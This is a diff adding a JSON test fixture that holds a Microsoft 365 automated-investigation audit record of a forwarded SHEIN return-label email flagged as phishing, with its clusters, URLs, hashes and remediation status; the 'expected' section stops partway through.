@@ -0,0 +1,170 @@ +{ + "input": { + "message": "{\n \"CreationTime\":\"2024-10-31T16:24:41\",\n \"Id\":\"c3ebef20-fb63-4d14-b3c1-7bfb5937903a\",\n \"Operation\":\"AirInvestigationData\",\n \"OrganizationId\":\"xxxxxx-xxxxx-xxxxxxx-xxxxxxx-xxxxxxx\",\n \"RecordType\":64,\n \"UserKey\":\"AirInvestigation\",\n \"UserType\":4,\n \"Version\":1,\n \"Workload\":\"AirInvestigation\",\n \"ObjectId\":\"c3ebef20-fb63-4d14-b3c1-7bfb5937903a\",\n \"UserId\":\"AirInvestigation\",\n \"Actions\":[\n \"{\\\"$id\\\":\\\"1\\\",\\\"ActionId\\\":\\\"urn:EmailZapper:a17bc80a136cbf4f5d4e82f43a9a3d1d\\\",\\\"InvestigationId\\\":\\\"urn:ZappedUrlInvestigation:611e72a0f8dc10fecbf6fc017c51d101\\\",\\\"ActionApproval\\\":\\\"None\\\",\\\"ActionType\\\":\\\"EmailRemediation\\\",\\\"ActionStatus\\\":\\\"Pending\\\",\\\"Entities\\\":[{\\\"$id\\\":\\\"2\\\",\\\"NetworkMessageIds\\\":[\\\"24b8430c-484d-4ee0-e12b-08dcee99416a\\\",\\\"2e99f39a-c998-4d94-2085-08dce9cd0b7d\\\",\\\"0ac4ee3c-7c79-408e-76c2-08dcf4106b65\\\",\\\"fd400540-8a8d-42ae-d1f9-08dced20c42f\\\",\\\"31cfca73-f309-4e21-cbc4-08dceed074cf\\\",\\\"0491b33a-15fc-4503-9dd1-08dced818f57\\\",\\\"4b620244-917b-4a04-7416-08dcf50af378\\\",\\\"1abed68d-3b03-46bd-45e2-08dcf43fb625\\\",\\\"abb4c4a5-7049-4047-5a68-08dcec201c1f\\\",\\\"92bba720-15bc-4f09-49f2-08dcf8d738a4\\\",\\\"3d511617-b717-416c-89cf-08dcf90a51c7\\\",\\\"c3ad4b6b-0fd9-4510-4481-08dcf9043502\\\",\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\",\\\"a1d9684c-9982-4f80-880c-08dcf775c1a9\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":5,\\\"Phish\\\":0,\\\"Malware\\\":0,\\\"Spam\\\":0,\\\"MaliciousUrl\\\":15},\\\"CountByProtectionStatus\\\":{\\\"Delivered\\\":10,\\\"Blocked\\\":4,\\\"DeliveredAsSpam\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"Inbox\\\":10,\\\"Quarantine\\\":4,\\\"DeletedFolder\\\":1},\\\"Query\\\":\\\"( ((NormalizedUrl:\\\\\\\"https://play.google.com/store/apps/details?id=com.zzkko&hl=en\\\\\\\") AND (ContentType: 1)) AND 
NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-10-31T13:31:54.2957192Z\\\",\\\"MailCount\\\":15,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"https://play.google.com/store/apps/details?id=com.zzkko&hl=en\\\",\\\"ClusterSourceType\\\":\\\"UrlThreatIndicator\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-10-11T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-10-31T13:31:54.2957192Z\\\",\\\"ClusterGroup\\\":\\\"UrlThreatIdentifier\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"NormalizedUrl;ContentType\\\",\\\"ClusterByValue\\\":\\\"https://play.google.com/store/apps/details?id=com.zzkko&hl=en;1\\\",\\\"QueryStartTime\\\":\\\"10/11/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"10/31/2024 1:31:54 PM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:cae0ce4483385c4ff176b00a0cd18f8e\\\",\\\"Source\\\":\\\"TestProvider\\\",\\\"FirstSeen\\\":\\\"2024-10-31T13:31:56\\\"}],\\\"RelatedAlertIds\\\":[\\\"fff21c13-c681-7398-1200-08dcf8958252\\\"],\\\"StartTimeUtc\\\":\\\"2024-10-31T13:33:19\\\",\\\"LastUpdateTimeUtc\\\":\\\"2024-10-31T15:28:45.1030022Z\\\",\\\"TimestampUtc\\\":\\\"2024-10-31T13:33:19\\\",\\\"BulkName\\\":\\\"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:611e72a0f8dc10fecbf6fc017c51d101\\\",\\\"ResourceIdentifiers\\\":[{\\\"$id\\\":\\\"3\\\",\\\"AadTenantId\\\":\\\"xxxxxx-xxxxx-xxxxxxx-xxxxxxx-xxxxxxx\\\",\\\"Type\\\":\\\"AAD\\\"}],\\\"PendingType\\\":\\\"User\\\",\\\"LogCreationTime\\\":\\\"2024-10-31T15:28:45.1030022Z\\\",\\\"MachineName\\\":\\\"MachineNameTest\\\",\\\"Description\\\":\\\"For malicious emails, you can move to junk, soft or hard delete from user's mailbox.\\\"}\"\n ],\n 
\"Data\":\"{\\\"Version\\\":\\\"3.0\\\",\\\"VendorName\\\":\\\"Microsoft\\\",\\\"ProviderName\\\":\\\"TestProvider\\\",\\\"AlertType\\\":\\\"8e6ba277-ef39-404e-aaf1-294f6d9a2b88\\\",\\\"StartTimeUtc\\\":\\\"2024-10-30T03:47:24Z\\\",\\\"EndTimeUtc\\\":\\\"2024-10-30T03:47:24Z\\\",\\\"TimeGenerated\\\":\\\"2024-10-30T03:52:49.16Z\\\",\\\"ProcessingEndTime\\\":\\\"2024-10-31T15:28:45.1030022Z\\\",\\\"Status\\\":\\\"InProgress\\\",\\\"DetectionTechnology\\\":\\\"UrlReputation\\\",\\\"Severity\\\":\\\"Informational\\\",\\\"ConfidenceLevel\\\":\\\"Unknown\\\",\\\"ConfidenceScore\\\":1.0,\\\"IsIncident\\\":false,\\\"ProviderAlertId\\\":\\\"fff21c13-c681-7398-1200-08dcf8958252\\\",\\\"SystemAlertId\\\":null,\\\"CorrelationKey\\\":\\\"bb0ac18c-5081-41e0-8656-f256ba9298d0\\\",\\\"Investigations\\\":[{\\\"$id\\\":\\\"1\\\",\\\"Id\\\":\\\"urn:ZappedUrlInvestigation:611e72a0f8dc10fecbf6fc017c51d101\\\",\\\"InvestigationStatus\\\":\\\"Running\\\"}],\\\"InvestigationIds\\\":[\\\"urn:ZappedUrlInvestigation:611e72a0f8dc10fecbf6fc017c51d101\\\"],\\\"Intent\\\":\\\"Probing\\\",\\\"ResourceIdentifiers\\\":[{\\\"$id\\\":\\\"2\\\",\\\"AadTenantId\\\":\\\"xxxxxx-xxxxx-xxxxxxx-xxxxxxx-xxxxxxx\\\",\\\"Type\\\":\\\"AAD\\\"}],\\\"AzureResourceId\\\":null,\\\"WorkspaceId\\\":null,\\\"WorkspaceSubscriptionId\\\":null,\\\"WorkspaceResourceGroup\\\":null,\\\"AgentId\\\":null,\\\"AlertDisplayName\\\":\\\"Email messages containing malicious URL removed after delivery\u200b\\\",\\\"Description\\\":\\\"Emails with malicious URL that were delivered and later removed 
-V1.0.0.3\\\",\\\"ExtendedLinks\\\":[{\\\"Href\\\":\\\"https://security.microsoft.com/alerts/fafff21c13-c681-7398-1200-08dcf8958252\\\",\\\"Category\\\":null,\\\"Label\\\":\\\"alert\\\",\\\"Type\\\":\\\"webLink\\\"}],\\\"Metadata\\\":{\\\"CustomApps\\\":null,\\\"GenericInfo\\\":null},\\\"Entities\\\":[{\\\"$id\\\":\\\"3\\\",\\\"Url\\\":\\\"https://play.google.com/store/apps/details?id=com.zzkko&hl=en\\\",\\\"Type\\\":\\\"url\\\",\\\"ClickCount\\\":0,\\\"EmailCount\\\":2,\\\"Urn\\\":\\\"urn:UrlEntity:289101bb3aa22cd0464dcd3ffa7116a8\\\",\\\"Source\\\":\\\"TestProvider\\\",\\\"FirstSeen\\\":\\\"2024-10-31T12:58:53\\\"},{\\\"$id\\\":\\\"4\\\",\\\"Files\\\":[{\\\"$id\\\":\\\"5\\\",\\\"Name\\\":\\\"returnLabel_314378736750.pdf\\\",\\\"FileHashes\\\":[{\\\"$id\\\":\\\"6\\\",\\\"Algorithm\\\":\\\"SHA256\\\",\\\"Value\\\":\\\"F9F5D882A83CAF93B3DBEACED8FCFCCD123ABDCD141A1B5423A74E387BA74D5D\\\",\\\"Type\\\":\\\"filehash\\\"}],\\\"Type\\\":\\\"file\\\",\\\"MalwareFamily\\\":null}],\\\"Recipient\\\":\\\"test.to@ixina.com\\\",\\\"Urls\\\":[\\\"https://u25492214.ct.sendgrid.net/ls/click?upn=u001.Ni9F2bUzMGygU7I6927xz-2BkzPoBjfVNj9CJCtsLW0zwNgmTcKgWQoyoJpwVuYlpQciOV7VFY4y40pT7PbFjZu-2BT61qNz-2FjLIbrl5IqV-2F6VA-3Dowc9_r5YCKD565fWzehHx-2FViuB8oHOL1DYwg-2Bfx4BUmzkfTPes7sa-2BVi-2BqS9kcdV08lhzTrs-2B4Lvsupi32g3cG4FINnNbknV9eEzYIqgaa4YfaZHEEHRVUWDqycf8mgAbrzvtnOX7pQHdt3iR6DHP-2BxR3PfnH-2BDzIJZkv1MK0yzBmp6oKxDmfijZNNeoMjhZ1voAZ4rYtu5m9xdiEh8pCCrwyFrXAffKU6vpGqbxQY4O5g0v8B7yN8HEfrFjo7Fn7G-2FQVkuoVw1L-2FcSqVGgGsGEOY4-2BG2cvJmEd1era-2FAnl53IvDmt-2FjEc5wDjePqx-2Ff9ahD7\\\",\\\"https://u25492214.ct.sendgrid.net/ls/click?upn=u001.Ni9F2bUzMGygU7I6927xz-2B7I3RFKjR2LTj-2FCdqvCgUA-3De-zv_r5YCKD565fWzehHx-2FViuB8oHOL1DYwg-2Bfx4BUmzkfTPes7sa-2BVi-2BqS9kcdV08lhzTrs-2B4Lvsupi32g3cG4FINnNbknV9eEzYIqgaa4YfaZHEEHRVUWDqycf8mgAbrzvtnOX7pQHdt3iR6DHP-2BxR3PfnH-2BDzIJZkv1MK0yzBmp6otxpVGSalyLT-2BMyMS7yEfvbLbY9v9Wjn3hkHG29S-2FBOFjoVX-2FSwv2kZeymJW-2FlgRvHCB20rH0kwYqIdOsdO-2FvuCq-2BU49-2FNEo4S2gaZRd0h3zn5MFhXxj-
2F-2FbW3X5gOaGP7-2FpGN-2BX-2BHRi1Xt1JzFgCpA\\\",\\\"https://u25492214.ct.sendgrid.net/ls/click?upn=u001.Ni9F2bUzMGygU7I6927xz49R6-2B-2FASLo-2BUtlyP-2F4iSjQlm-2F4HWFki90oq-2Bc29Sr-2BJAxlu_r5YCKD565fWzehHx-2FViuB8oHOL1DYwg-2Bfx4BUmzkfTPes7sa-2BVi-2BqS9kcdV08lhzTrs-2B4Lvsupi32g3cG4FINnNbknV9eEzYIqgaa4YfaZHEEHRVUWDqycf8mgAbrzvtnOX7pQHdt3iR6DHP-2BxR3PfnH-2BDzIJZkv1MK0yzBmp6qR2GRWjTyLjKHBwmcXgTV-2BMq0R5qnuDMHYAbrFxAmtHiepp1aU8L-2FOCt-2BiboZksoqBfuo-2FcqBrfi9un8ILJByRUOZM3T6alRzsB1jmdLOKOZwr3m8kymuz3dFvNya6aYPmSZG4l57ycCGBya5xMMqf\\\",\\\"https://u25492214.ct.sendgrid.net/ls/click?upn=u001.Ni9F2bUzMGygU7I6927xz1dNl4cyoCqQhbWGcqggHJW8SDLFVls-2FdSGWRn2n26uXgiSb-2FLZ3Oc-2F6taFyBHXTJv-2BdvE0YkDtEsaWUVnnpz7Lus9fp2MjvsYOqibyuC9Sjzgm4flo2XfvY4y5mBWuQF-2F7nM55pZ5S6S-2BSuNa5j-2BID5HJzdZOlXc2nyvbxmDFrTDuau_r5YCKD565fWzehHx-2FViuB8oHOL1DYwg-2Bfx4BUmzkfTPes7sa-2BVi-2BqS9kcdV08lhzTrs-2B4Lvsupi32g3cG4FINnNbknV9eEzYIqgaa4YfaZHEEHRVUWDqycf8mgAbrzvtnOX7pQHdt3iR6DHP-2BxR3PfnH-2BDzIJZkv1MK0yzBmp6oCyme2zPY6GKJBwI7FWZYrXhePHLdzV5WL-2F5EJubwqlYflj1CI9yL7Xfb24ks7WDE2wa8hQ-2BQ3h8K7-2FNpWkzEtiEQPiPEF3zOMzaOlqjkbPLg0UzpEmObjky1BycKoXMMwtfEuHLB9VnhNmDV3aIW2\\\",\\\"https://u25492214.ct.sendgrid.net/ls/click?upn=u001.Ni9F2bUzMGygU7I6927xzwS57HzRFV06M2bzMBaRY-2BtdD2HhGOqR6HD9j7eU3woqib3lW0qFsRIYtEfnDRINtIJErjGpQG2ad3jjAbAIacwJ4Le0eScR4TY1ExyusbvGQU5p_r5YCKD565fWzehHx-2FViuB8oHOL1DYwg-2Bfx4BUmzkfTPes7sa-2BVi-2BqS9kcdV08lhzTrs-2B4Lvsupi32g3cG4FINnNbknV9eEzYIqgaa4YfaZHEEHRVUWDqycf8mgAbrzvtnOX7pQHdt3iR6DHP-2BxR3PfnH-2BDzIJZkv1MK0yzBmp6psejQMn2EzritsHjoZX3rBM6GN1Gt7OeDjl2fzK-2BAK5-2FzHIjoTmyFKIkBvxn4mrKqstgF5tkhF6rc-2BIL2TqH7FTpqHdxk6lMOLfZVS4DrhiP-2FvyHZwSo2RzY-2BDmTRvcBEOqOwutpZKgr0m7fArTF-2Fv\\\",\\\"http://shein.ltwebstatic.com/advertise/shein/www/images_sheIn/SheIn_logo1_1.png\\\",\\\"https://romwe.ltwebstatic.com/advertise/romwe/www/images_Romwe/edm3_09_2.jpg\\\",\\\"https://romwe.ltwebstatic.com/advertise/romwe/www/images_Romwe/edm3_11_1.jpg\\\",\\\"https://play.google.com/store/apps/details?id=com.
zzkko&hl=en\\\",\\\"https://fr.shein.com/\\\",\\\"https://fr.shein.com/robot\\\",\\\"https://fr.shein.com/user/order_return/order_return_label/GSONEQ62U001GKT?country=France&refund_bill_id=&return_order_id=NE91E0E8C1\\\",\\\"https://itunes.apple.com/us/app/yub-streetwear-fashion-shopping/id878577184?mt=8\\\"],\\\"Threats\\\":[\\\"ZapPhish\\\",\\\"HighConfPhish\\\"],\\\"Sender\\\":\\\"test.sender@gmail.com\\\",\\\"P1Sender\\\":\\\"test.sender@gmail.com\\\",\\\"P1SenderDomain\\\":\\\"gmail.com\\\",\\\"SenderIP\\\":\\\"1.2.3.4\\\",\\\"P2Sender\\\":\\\"test.sender@gmail.com\\\",\\\"P2SenderDisplayName\\\":\\\"Fanny Barriol\\\",\\\"P2SenderDomain\\\":\\\"gmail.com\\\",\\\"ReceivedDate\\\":\\\"2024-10-29T21:12:56\\\",\\\"NetworkMessageId\\\":\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\",\\\"InternetMessageId\\\":\\\"\\\",\\\"Subject\\\":\\\"Fwd: Votre \u00e9tiquette de retour de SHEIN\\\",\\\"AntispamDirection\\\":\\\"Inbound\\\",\\\"DeliveryAction\\\":\\\"Blocked\\\",\\\"ThreatDetectionMethods\\\":[\\\"UrlReputation\\\"],\\\"Language\\\":\\\"fr\\\",\\\"DeliveryLocation\\\":\\\"Quarantine\\\",\\\"OriginalDeliveryLocation\\\":\\\"Inbox\\\",\\\"PhishConfidenceLevel\\\":\\\"High\\\",\\\"AdditionalActionsAndResults\\\":[\\\"OriginalDelivery: [N/A]\\\",\\\"Zap: [Success: Message moved to quarantine]\\\"],\\\"AuthDetails\\\":[{\\\"Name\\\":\\\"SPF\\\",\\\"Value\\\":\\\"Pass\\\"},{\\\"Name\\\":\\\"DKIM\\\",\\\"Value\\\":\\\"Pass\\\"},{\\\"Name\\\":\\\"DMARC\\\",\\\"Value\\\":\\\"Pass\\\"},{\\\"Name\\\":\\\"Comp 
Auth\\\",\\\"Value\\\":\\\"pass\\\"}],\\\"SystemOverrides\\\":[],\\\"Type\\\":\\\"mailMessage\\\",\\\"Urn\\\":\\\"urn:MailEntity:79be71f3203d9db81f0076352eca662e\\\",\\\"Source\\\":\\\"TestProvider\\\",\\\"FirstSeen\\\":\\\"2024-10-31T12:58:53\\\"},{\\\"$id\\\":\\\"7\\\",\\\"MailboxPrimaryAddress\\\":\\\"test.to@ixina.com\\\",\\\"Upn\\\":\\\"test.to@ixina.com\\\",\\\"AadId\\\":\\\"2011d28b-3a87-4359-b2a0-7d14f0a83828\\\",\\\"RiskLevel\\\":\\\"None\\\",\\\"Type\\\":\\\"mailbox\\\",\\\"Urn\\\":\\\"urn:UserEntity:f182c190672d0194477f316c5f0367e5\\\",\\\"Source\\\":\\\"TestProvider\\\",\\\"FirstSeen\\\":\\\"2024-10-31T12:58:53\\\"},{\\\"$id\\\":\\\"8\\\",\\\"NetworkMessageIds\\\":[\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":1,\\\"Phish\\\":0,\\\"Malware\\\":0,\\\"Spam\\\":0},\\\"CountByProtectionStatus\\\":{\\\"Blocked\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"Quarantine\\\":1},\\\"Query\\\":\\\"( (( (BodyFingerprintBin1:\\\\\\\"2929356879\\\\\\\") ) AND ( (SenderIp:\\\\\\\"1.2.3.4\\\\\\\") ) AND ( (ContentType: 1) )) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-10-31T13:31:45.0302157Z\\\",\\\"MailCount\\\":1,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\",\\\"ClusterSourceType\\\":\\\"Similarity\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-10-11T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-10-31T13:31:45.0302157Z\\\",\\\"ClusterGroup\\\":\\\"BodyFingerprintBin1,SenderIp\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"BodyFingerprintBin1;SenderIp;ContentType\\\",\\\"ClusterByValue\\\":\\\"2929356879;1.2.3.4;1\\\",\\\"QueryStartTime\\\":\\\"10/11/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"10/31/2024 1:31:45 
PM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:0b159e7db54d59b4165e81fb02f6c656\\\",\\\"Source\\\":\\\"TestProvider\\\",\\\"FirstSeen\\\":\\\"2024-10-31T13:31:52\\\"},{\\\"$id\\\":\\\"9\\\",\\\"NetworkMessageIds\\\":[\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":1,\\\"Phish\\\":0,\\\"Malware\\\":0,\\\"Spam\\\":0},\\\"CountByProtectionStatus\\\":{\\\"Blocked\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"Quarantine\\\":1},\\\"Query\\\":\\\"( (( (Subject:\\\\\\\"Fwd: Votre \u00e9tiquette de retour de SHEIN\\\\\\\") ) AND ( (P2SenderDomain:\\\\\\\"gmail.com\\\\\\\") ) AND ( (AntispamDirection:\\\\\\\"1\\\\\\\") ) AND ( (ContentType: 1) )) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-10-31T13:31:45.0302157Z\\\",\\\"MailCount\\\":1,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\",\\\"ClusterSourceType\\\":\\\"Similarity\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-10-11T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-10-31T13:31:45.0302157Z\\\",\\\"ClusterGroup\\\":\\\"Subject,P2SenderDomain,AntispamDirection\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"Subject;P2SenderDomain;AntispamDirection;ContentType\\\",\\\"ClusterByValue\\\":\\\"Fwd: Votre \u00e9tiquette de retour de SHEIN;gmail.com;1;1\\\",\\\"QueryStartTime\\\":\\\"10/11/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"10/31/2024 1:31:45 
PM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:5e820543f7cce922d13fcc25a0ca2204\\\",\\\"Source\\\":\\\"TestProvider\\\",\\\"FirstSeen\\\":\\\"2024-10-31T13:31:52\\\"},{\\\"$id\\\":\\\"10\\\",\\\"NetworkMessageIds\\\":[\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":1,\\\"Phish\\\":0,\\\"Malware\\\":0,\\\"Spam\\\":0},\\\"CountByProtectionStatus\\\":{\\\"Blocked\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"Quarantine\\\":1},\\\"Query\\\":\\\"( (( (Subject:\\\\\\\"Fwd: Votre \u00e9tiquette de retour de SHEIN\\\\\\\") ) AND ( (SenderIp:\\\\\\\"1.2.3.4\\\\\\\") ) AND ( (AntispamDirection:\\\\\\\"1\\\\\\\") ) AND ( (ContentType: 1) )) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-10-31T13:31:45.0302157Z\\\",\\\"MailCount\\\":1,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\",\\\"ClusterSourceType\\\":\\\"Similarity\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-10-11T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-10-31T13:31:45.0302157Z\\\",\\\"ClusterGroup\\\":\\\"Subject,SenderIp,AntispamDirection\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"Subject;SenderIp;AntispamDirection;ContentType\\\",\\\"ClusterByValue\\\":\\\"Fwd: Votre \u00e9tiquette de retour de SHEIN;1.2.3.4;1;1\\\",\\\"QueryStartTime\\\":\\\"10/11/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"10/31/2024 1:31:45 PM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:a42bb73f2f36d917364f11fe67f0c39b\\\",\\\"Source\\\":\\\"TestProvider\\\",\\\"FirstSeen\\\":\\\"2024-10-31T13:31:52\\\"},{\\\"$id\\\":\\\"11\\\",\\\"NetworkMessageIds\\\":[\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":1,\\\"Phish\\\":0,\\\"Malware\\\":0,\\\"Spam\\\":0},\\\"CountByProtectionStatus\\\":{\\\"Blocked\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"Quarantine\\\":1},\\\"Query\\\":\\\"( (( 
(BodyFingerprintBin1:\\\\\\\"2929356879\\\\\\\") ) AND ( (P2SenderDomain:\\\\\\\"gmail.com\\\\\\\") ) AND ( (ContentType: 1) )) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-10-31T13:31:45.0302157Z\\\",\\\"MailCount\\\":1,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\",\\\"ClusterSourceType\\\":\\\"Similarity\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-10-11T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-10-31T13:31:45.0302157Z\\\",\\\"ClusterGroup\\\":\\\"BodyFingerprintBin1,P2SenderDomain\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"BodyFingerprintBin1;P2SenderDomain;ContentType\\\",\\\"ClusterByValue\\\":\\\"2929356879;gmail.com;1\\\",\\\"QueryStartTime\\\":\\\"10/11/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"10/31/2024 1:31:45 PM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:a5f65badbcbc2e3c6409625436363a29\\\",\\\"Source\\\":\\\"TestProvider\\\",\\\"FirstSeen\\\":\\\"2024-10-31T13:31:52\\\"},{\\\"$id\\\":\\\"12\\\",\\\"NetworkMessageIds\\\":[\\\"24b8430c-484d-4ee0-e12b-08dcee99416a\\\",\\\"2e99f39a-c998-4d94-2085-08dce9cd0b7d\\\",\\\"0ac4ee3c-7c79-408e-76c2-08dcf4106b65\\\",\\\"fd400540-8a8d-42ae-d1f9-08dced20c42f\\\",\\\"31cfca73-f309-4e21-cbc4-08dceed074cf\\\",\\\"0491b33a-15fc-4503-9dd1-08dced818f57\\\",\\\"4b620244-917b-4a04-7416-08dcf50af378\\\",\\\"1abed68d-3b03-46bd-45e2-08dcf43fb625\\\",\\\"abb4c4a5-7049-4047-5a68-08dcec201c1f\\\",\\\"92bba720-15bc-4f09-49f2-08dcf8d738a4\\\",\\\"3d511617-b717-416c-89cf-08dcf90a51c7\\\",\\\"c3ad4b6b-0fd9-4510-4481-08dcf9043502\\\",\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\",\\\"a1d9684c-9982-4f80-880c-08dcf775c1a9\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":5,\\\"Phish\\\":0,\\\"Malware\\\":0,\\\"Spam\\\":0,\\\"MaliciousUrl\\\":15},\\\"CountByProtectionStatus\\\":{\\\"Delivered\\\":10,\\\"Blocked\\\":4,\\\"DeliveredAsSpam\\\":1},\\\"CountByDeliv
eryLocation\\\":{\\\"Inbox\\\":10,\\\"Quarantine\\\":4,\\\"DeletedFolder\\\":1},\\\"Query\\\":\\\"( ((NormalizedUrl:\\\\\\\"https://play.google.com/store/apps/details?id=com.zzkko&hl=en\\\\\\\") AND (ContentType: 1)) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-10-31T13:31:54.2957192Z\\\",\\\"MailCount\\\":15,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"https://play.google.com/store/apps/details?id=com.zzkko&hl=en\\\",\\\"ClusterSourceType\\\":\\\"UrlThreatIndicator\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-10-11T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-10-31T13:31:54.2957192Z\\\",\\\"ClusterGroup\\\":\\\"UrlThreatIdentifier\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"NormalizedUrl;ContentType\\\",\\\"ClusterByValue\\\":\\\"https://play.google.com/store/apps/details?id=com.zzkko&hl=en;1\\\",\\\"QueryStartTime\\\":\\\"10/11/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"10/31/2024 1:31:54 PM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:cae0ce4483385c4ff176b00a0cd18f8e\\\",\\\"Source\\\":\\\"TestProvider\\\",\\\"FirstSeen\\\":\\\"2024-10-31T13:31:56\\\"}],\\\"LogCreationTime\\\":\\\"2024-10-31T15:28:45.1030022Z\\\",\\\"MachineName\\\":\\\"MachineNameTest\\\",\\\"SourceTemplateType\\\":\\\"Threat_Single\\\",\\\"Category\\\":\\\"ThreatManagement\\\",\\\"SourceAlertType\\\":\\\"System\\\"}\",\n \"DeepLinkUrl\":\"https://security.microsoft.com/mtp-investigation/urn:ZappedUrlInvestigation:611e72a0f8dc10fecbf6fc017c51d101\",\n \"EndTimeUtc\":\"2024-10-31T15:26:49\",\n \"InvestigationId\":\"urn:ZappedUrlInvestigation:611e72a0f8dc10fecbf6fc017c51d101\",\n \"InvestigationName\":\"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:611e72a0f8dc10fecbf6fc017c51d101\",\n \"InvestigationType\":\"ZappedUrlInvestigation\",\n \"LastUpdateTimeUtc\":\"2024-10-31T12:59:19\",\n \"RunningTime\":9022,\n 
\"StartTimeUtc\":\"2024-10-31T12:58:22\",\n \"Status\":\"Pending Action\"\n }" + }, + "expected": { + "message": "{\n \"CreationTime\":\"2024-10-31T16:24:41\",\n \"Id\":\"c3ebef20-fb63-4d14-b3c1-7bfb5937903a\",\n \"Operation\":\"AirInvestigationData\",\n \"OrganizationId\":\"xxxxxx-xxxxx-xxxxxxx-xxxxxxx-xxxxxxx\",\n \"RecordType\":64,\n \"UserKey\":\"AirInvestigation\",\n \"UserType\":4,\n \"Version\":1,\n \"Workload\":\"AirInvestigation\",\n \"ObjectId\":\"c3ebef20-fb63-4d14-b3c1-7bfb5937903a\",\n \"UserId\":\"AirInvestigation\",\n \"Actions\":[\n 